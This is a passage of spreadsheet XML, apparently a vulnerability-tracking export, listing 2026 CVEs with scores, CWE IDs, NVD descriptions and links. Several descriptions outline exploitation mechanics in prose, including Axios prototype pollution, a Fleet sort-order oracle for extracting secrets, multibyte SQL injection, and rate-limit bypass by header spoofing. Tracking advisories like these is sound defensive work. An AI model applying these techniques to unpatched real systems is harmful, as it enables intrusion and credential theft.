      <c r="J1496" s="5" t="inlineStr"/>
      <c r="K1496" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1496" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Read vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41607</t>
        </is>
      </c>
    </row>
    <row r="1497">
      <c r="A1497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42041</t>
        </is>
      </c>
      <c r="C1497" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1497" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1497" s="5" t="inlineStr"/>
      <c r="F1497" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1497" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1497" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1497" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J1497" s="5" t="inlineStr"/>
      <c r="K1497" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-287, CWE-915</t>
        </is>
      </c>
      <c r="L1497" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution to silently suppress all HTTP error responses (401, 403, 500, etc.), causing them to be treated as successful responses. This completely bypasses application-level authentication and error handling. The root cause is that validateStatus is the only config property using the mergeDirectKeys merge strategy, which uses JavaScript's in operator — an operator that inherently traverses the prototype chain. When Object.prototype.validateStatus is polluted with () =&gt; true, all HTTP status codes are accepted as success. This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M1497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42041</t>
        </is>
      </c>
    </row>
    <row r="1498">
      <c r="A1498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44766</t>
        </is>
      </c>
      <c r="C1498" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1498" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1498" s="5" t="inlineStr"/>
      <c r="F1498" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1498" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1498" s="5" t="inlineStr"/>
      <c r="I1498" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1498" s="5" t="inlineStr"/>
      <c r="K1498" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1498" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Intercompany Matching and Reconciliation) allows a low-privileged authenticated user to inject malicious input into certain functions, which may be processed by the database without proper validation. This could allow the user to access sensitive information, resulting in high impact on confidentiality, with no impact on integrity and availability of the application.</t>
        </is>
      </c>
      <c r="M1498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t>
        </is>
      </c>
    </row>
    <row r="1499">
      <c r="A1499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46370</t>
        </is>
      </c>
      <c r="C1499" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1499" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1499" s="5" t="inlineStr"/>
      <c r="F1499" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1499" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1499" s="5" t="inlineStr"/>
      <c r="I1499" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1499" s="5" t="inlineStr"/>
      <c r="K1499" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-89</t>
        </is>
      </c>
      <c r="L1499" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions up to and including 4.84.1, the labels host-listing endpoint (GET /api/v1/fleet/labels/{id}/hosts) allowed an authenticated user with the lowest-privilege Observer role to extract host enrollment secrets through a sort-order oracle. The endpoint accepted a user-supplied order_key parameter that was not validated against a column allowlist, so an attacker with Global or Team Observer access could set the sort column to a sensitive field such as h.node_key and combine it with the cursor-based after parameter to binary-search the value one character at a time; the targeted value never appeared in the response, but the presence or absence of results revealed each character. Because node_key and orbit_node_key are the long-lived shared secrets that osquery and Orbit agents use to authenticate to the Fleet server, an attacker who reconstructed them could impersonate enrolled hosts, submit fabricated query results and inventory, retrieve pending scripts and MDM commands, and poison compliance and policy results across the deployment. This issue is fixed in version 4.84.2.</t>
        </is>
      </c>
      <c r="M1499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46370</t>
        </is>
      </c>
    </row>
    <row r="1500">
      <c r="A1500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46371</t>
        </is>
      </c>
      <c r="C1500" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1500" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1500" s="5" t="inlineStr"/>
      <c r="F1500" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1500" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1500" s="5" t="inlineStr"/>
      <c r="I1500" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1500" s="5" t="inlineStr"/>
      <c r="K1500" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-89</t>
        </is>
      </c>
      <c r="L1500" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions up to and including 4.84.1, the Apple MDM commands listing endpoint (GET /api/v1/fleet/mdm/apple/commands) allowed an authenticated user with the lowest-privilege Observer role to extract sensitive values from joined database tables, including host enrollment secrets and Apple Push Notification Service tokens, through a sort-order oracle. The endpoint accepted a user-supplied order_key parameter that was not validated against a column allowlist, and because the underlying query joins the hosts and nano_enrollments tables, an attacker could set the sort column to a sensitive field and combine it with the cursor-based after parameter to binary-search the value one character at a time, with the presence or absence of results revealing each character even though the value never appeared in the response. With extracted node_key or orbit_node_key values an attacker could impersonate enrolled hosts to Fleet's osquery and Orbit endpoints, submit fabricated host data, and retrieve pending scripts and commands. This issue is fixed in version 4.84.2.</t>
        </is>
      </c>
      <c r="M1500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46371</t>
        </is>
      </c>
    </row>
    <row r="1501">
      <c r="A1501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48093</t>
        </is>
      </c>
      <c r="C1501" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1501" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1501" s="5" t="inlineStr"/>
      <c r="F1501" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1501" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1501" s="5" t="inlineStr"/>
      <c r="I1501" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1501" s="5" t="inlineStr"/>
      <c r="K1501" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1501" s="5" t="inlineStr">
        <is>
          <t>The Code Embed WordPress plugin prior to version 2.6.1 is vulnerable to stored Cross-Site Scripting (XSS) through the external URL embed feature in post content. The vulnerable code scans rendered content for URL embed tokens, fetches the remote URL, and inserts the remote response body into the page without output sanitization or an `unfiltered_html` capability check. This allows a Contributor attacker to submit a pending post containing an inert-looking URL token that executes attacker-controlled JavaScript when an Administrator or Editor previews or reviews the post. This is distinct from CVE-2026-2512, which affected custom field meta values up to version 2.5.1. This vector affects version 2.6 and uses the documented external URL embed feature in post content. This particular issue is patched in version 2.6.1.</t>
        </is>
      </c>
      <c r="M1501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48093</t>
        </is>
      </c>
    </row>
    <row r="1502">
      <c r="A1502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48786</t>
        </is>
      </c>
      <c r="C1502" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1502" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1502" s="5" t="inlineStr"/>
      <c r="F1502" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1502" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1502" s="5" t="inlineStr"/>
      <c r="I1502" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1502" s="5" t="inlineStr"/>
      <c r="K1502" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1502" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.87.0, the target search endpoint (POST /api/latest/fleet/targets) returned unmasked team enroll secrets and full team configuration, including credential-bearing agent options, to low-privilege observer-class users. Other team-facing endpoints mask these fields for observers, but the target search endpoint did not apply the same sanitization, so an authenticated user with the Observer, Observer+, or Technician role, whether global or team-scoped, could retrieve the secrets and agent options by performing a target search against an observer-runnable query. With a leaked team enroll secret an attacker could enroll unauthorized hosts into the affected team, and if the team's agent options contained credentials such as AWS secret access keys or proxy passwords, those values were disclosed as well. This issue is fixed in version 4.87.0.</t>
        </is>
      </c>
      <c r="M1502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48786</t>
        </is>
      </c>
    </row>
    <row r="1503">
      <c r="A1503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49466</t>
        </is>
      </c>
      <c r="C1503" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1503" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1503" s="5" t="inlineStr"/>
      <c r="F1503" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1503" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1503" s="5" t="inlineStr"/>
      <c r="I1503" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1503" s="5" t="inlineStr"/>
      <c r="K1503" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1503" s="5" t="inlineStr">
        <is>
          <t>Draft List is a WordPress plugin to manage and promote unpublished content. Versions 2.6.3 and below are vulnerable to stored Cross-Site Scripting (XSS) in the `[drafts]` shortcode and Draft List widget when the documented custom `template` option places the `{{draft}}` placeholder inside an HTML attribute. The vulnerable code inserts the raw draft `post_title` into `{{draft}}` when the current viewer cannot edit posts. Because the template is sanitized before `{{draft}}` replacement, a Contributor can store a quote-only title payload that breaks out of an attribute in a site-configured Draft List template and executes JavaScript for visitors who load the public page. Version 2.6.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M1503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49466</t>
        </is>
      </c>
    </row>
    <row r="1504">
      <c r="A1504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52733</t>
        </is>
      </c>
      <c r="C1504" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1504" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1504" s="5" t="inlineStr"/>
      <c r="F1504" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1504" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1504" s="5" t="inlineStr"/>
      <c r="I1504" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1504" s="5" t="inlineStr"/>
      <c r="K1504" s="5" t="inlineStr">
        <is>
          <t>CWE-459, CWE-672</t>
        </is>
      </c>
      <c r="L1504" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a natural or attacker-influenced chain fork can leave stale Sapling and Orchard note-commitment subtree roots in Zebra state. In zebra-state/src/service/non_finalized_state/chain.rs, Chain::pop_tip removed a reverted tip block but did not remove subtree entries whose end_height belonged to that block, unlike the cleanup performed by pop_root. When the winning fork later finalized, the abandoned branch's stale subtree data could be written to RocksDB and survive node restarts. The corrupted history can cause z_getsubtreesbyindex consumers such as lightwalletd and light wallets to receive incorrect subtree roots, producing wallet synchronization failures or incorrect wallet state and requiring a full state rebuild for recovery. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M1504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52733</t>
        </is>
      </c>
    </row>
    <row r="1505">
      <c r="A1505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53583</t>
        </is>
      </c>
      <c r="C1505" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1505" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1505" s="5" t="inlineStr"/>
      <c r="F1505" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1505" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1505" s="5" t="inlineStr"/>
      <c r="I1505" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1505" s="5" t="inlineStr"/>
      <c r="K1505" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297</t>
        </is>
      </c>
      <c r="L1505" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, verify_server_cert in src/libgit2/streams/openssl.c uses an inverted !!memcmp result in the GEN_IPADD branch when comparing an IP-literal host with a certificate IP SubjectAltName. OpenSSL builds reject matching IP addresses and accept mismatched IP addresses, allowing a network attacker with a CA-trusted certificate containing any IP SubjectAltName to intercept libgit2 connections to IP-literal HTTPS URLs. DNS SubjectAltName validation and non-OpenSSL TLS backends are not affected. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="M1505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53583</t>
        </is>
      </c>
    </row>
    <row r="1506">
      <c r="A1506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54732</t>
        </is>
      </c>
      <c r="C1506" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1506" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1506" s="5" t="inlineStr"/>
      <c r="F1506" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1506" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1506" s="5" t="inlineStr"/>
      <c r="I1506" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1506" s="5" t="inlineStr"/>
      <c r="K1506" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1506" s="5" t="inlineStr">
        <is>
          <t>libreoffice-convert is a Node.js module for converting office documents to different formats. Prior to 1.8.2, index.js uses the caller-controlled options.fileName value in path.join(tempDir.name, fileName) without reducing it to a base name. A filename containing ../ can escape the temporary directory because path.basename() normalization is missing and write the supplied document buffer to an arbitrary path writable by the process, including an SSH authorized_keys file, a cron configuration, or a web root. This issue is fixed in version 1.8.2.</t>
        </is>
      </c>
      <c r="M1506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54732</t>
        </is>
      </c>
    </row>
    <row r="1507">
      <c r="A1507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54738</t>
        </is>
      </c>
      <c r="C1507" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1507" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1507" s="5" t="inlineStr"/>
      <c r="F1507" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1507" s="5" t="inlineStr">
        <is>
          <t>nginx, docker</t>
        </is>
      </c>
      <c r="H1507" s="5" t="inlineStr"/>
      <c r="I1507" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1507" s="5" t="inlineStr"/>
      <c r="K1507" s="5" t="inlineStr">
        <is>
          <t>CWE-799</t>
        </is>
      </c>
      <c r="L1507" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. Prior to 0.19.19 and 1.0.0-beta.1, actix-web ConnectionInfo::realip_remote_addr reads the first value of X-Forwarded-For as the client address used by raw_ip_key in crates/utils/src/rate_limit/mod.rs. Lemmy's bundled docker/nginx.conf uses $proxy_add_x_forwarded_for instead of $remote_addr, which appends the real client address to an X-Forwarded-For value supplied by the client. An unauthenticated attacker can therefore place a different spoofed address first on each request and receive a new rate-limit bucket, bypassing limits on POST /api/v4/account/auth/register, POST /api/v4/account/auth/login, POST /api/v4/post, POST /api/v4/comment, GET /api/v4/search, POST /api/v4/image, and POST /api/v4/account/import_settings. This permits excessive account creation, brute-force attempts, spam, scraping, uploads, and repeated imports. This issue is fixed in versions 0.19.19 and 1.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M1507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54738</t>
        </is>
      </c>
    </row>
    <row r="1508">
      <c r="A1508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55545</t>
        </is>
      </c>
      <c r="C1508" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1508" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1508" s="5" t="inlineStr"/>
      <c r="F1508" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1508" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1508" s="5" t="inlineStr"/>
      <c r="I1508" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1508" s="5" t="inlineStr"/>
      <c r="K1508" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1508" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs WebSocket subscription handlers fail to enforce the privileges required by equivalent REST endpoints. PacketsApi.subscribePackets exposes the packets WebSocket topic without ObjectPrivilegeType.ReadPacket, ProcessingApi.subscribeAlgorithmStatus exposes the algorithm-status WebSocket topic without ObjectPrivilegeType.ReadAlgorithm, and MdbOverrideApi.subscribeMdbChanges exposes the mdb-changes WebSocket topic without SystemPrivilege.GetMissionDatabase. A low-privilege authenticated user can receive telemetry packets, algorithm status, and mission database change information outside the assigned authorization scope. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M1508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55545</t>
        </is>
      </c>
    </row>
    <row r="1509">
      <c r="A1509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55549</t>
        </is>
      </c>
      <c r="C1509" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1509" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1509" s="5" t="inlineStr"/>
      <c r="F1509" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1509" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1509" s="5" t="inlineStr"/>
      <c r="I1509" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1509" s="5" t="inlineStr"/>
      <c r="K1509" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1509" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.9.4, Yamcs reflects an attacker-controlled redirect_uri parameter from GET /auth/authorize into yamcs-core/src/main/resources/auth/templates/authorize.html without adequate HTML escaping by yamcs-core/src/main/java/org/yamcs/http/auth/AuthHandler.java and yamcs-core/src/main/java/org/yamcs/http/HandlerContext.java. A crafted authorization URL can execute JavaScript when opened by a Yamcs user. The script can access browser-held authentication material and transmit it to an attacker, enabling account compromise. This issue is fixed in version 5.9.4.</t>
        </is>
      </c>
      <c r="M1509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55549</t>
        </is>
      </c>
    </row>
    <row r="1510">
      <c r="A1510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55618</t>
        </is>
      </c>
      <c r="C1510" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1510" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1510" s="5" t="inlineStr"/>
      <c r="F1510" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1510" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1510" s="5" t="inlineStr"/>
      <c r="I1510" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1510" s="5" t="inlineStr"/>
      <c r="K1510" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L1510" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, the clean_found_uri function in eml_parser/parser.py validates potential URL strings before unescaping HTML entities used for colon, slash, or period characters. Valid encoded URLs and their host names are therefore rejected and omitted from the extracted URL and domain lists. Email security gateways and SOC pipelines that use those lists as indicators of compromise may fail to submit the hidden URLs to threat intelligence feeds, reputation services, or sandboxes, allowing malicious links to bypass inspection. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="M1510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55618</t>
        </is>
      </c>
    </row>
    <row r="1511">
      <c r="A1511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55855</t>
        </is>
      </c>
      <c r="C1511" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1511" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1511" s="5" t="inlineStr"/>
      <c r="F1511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1511" s="5" t="inlineStr">
        <is>
          <t>node.js, mysql</t>
        </is>
      </c>
      <c r="H1511" s="5" t="inlineStr"/>
      <c r="I1511" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1511" s="5" t="inlineStr"/>
      <c r="K1511" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-89</t>
        </is>
      </c>
      <c r="L1511" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.4, 3.3.3, 3.4.6, and 3.5.3, MariaDB Connector/Node.js permits SQL injection when attacker-controlled Buffer parameters are escaped client-side under the big5, gbk, sjis, cp932, or gb18030 client character sets. PacketOutputStream.writeBufferEscape in lib/io/packet-output-stream.js escaped bytes without the charset-aware getMbRecognizer logic in lib/misc/charset-mb.js. The server SQL lexer runs my_ismbchar before escape processing, so an attacker-controlled lead byte can consume the inserted 0x5C backslash as a multibyte trail byte and leave the following 0x27 quote unescaped, terminating the string literal and allowing arbitrary SQL. The default utf8mb4 character set and parameters sent through the execute binary prepared-statement path are not affected. Successful exploitation can expose or modify data available to the database account. This issue is fixed in versions 3.2.4, 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="M1511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55855</t>
        </is>
      </c>
    </row>
    <row r="1512">
      <c r="A1512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56818</t>
        </is>
      </c>
      <c r="C1512" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1512" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1512" s="5" t="inlineStr"/>
      <c r="F1512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1512" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1512" s="5" t="inlineStr"/>
      <c r="I1512" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1512" s="5" t="inlineStr"/>
      <c r="K1512" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-703</t>
        </is>
      </c>
      <c r="L1512" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, the RedisArrayAggregator Redis codec clears retained partial aggregate state when the maxNestedArrayDepth limit is exceeded, but it does not clear the same state when the sibling maxElements limit is exceeded. A peer can start a valid RESP array, send a bulk string child, then send a nested array header longer than the configured maxElements. Netty throws a decoder exception in decodeRedisArrayHeader, but the existing partial aggregate remains retained in the handler. If the application leaves the channel alive after the exception, later messages are still consumed into the pre-error aggregate, allowing an unauthenticated peer to keep attacker-controlled aggregate state alive across a security-limit exception and pin retained pooled buffers. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.</t>
        </is>
      </c>
      <c r="M1512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56818</t>
        </is>
      </c>
    </row>
    <row r="1513">
      <c r="A1513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57822</t>
        </is>
      </c>
      <c r="C1513" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1513" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1513" s="5" t="inlineStr"/>
      <c r="F1513" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1513" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H1513" s="5" t="inlineStr"/>
      <c r="I1513" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1513" s="5" t="inlineStr"/>
      <c r="K1513" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1513" s="5" t="inlineStr">
        <is>
          <t>When the broker is processing message-based management requests, sent by an authenticated messaging client that is authorized with MANAGE permission to perform management-via-messaging, the parameter processing can trigger Java deserialization of certain method parameters that the broker will not utilise. The permitted types allow to craft a payload causing excessive computation and pinning the processing thread, leading to denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.3.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57822</t>
        </is>
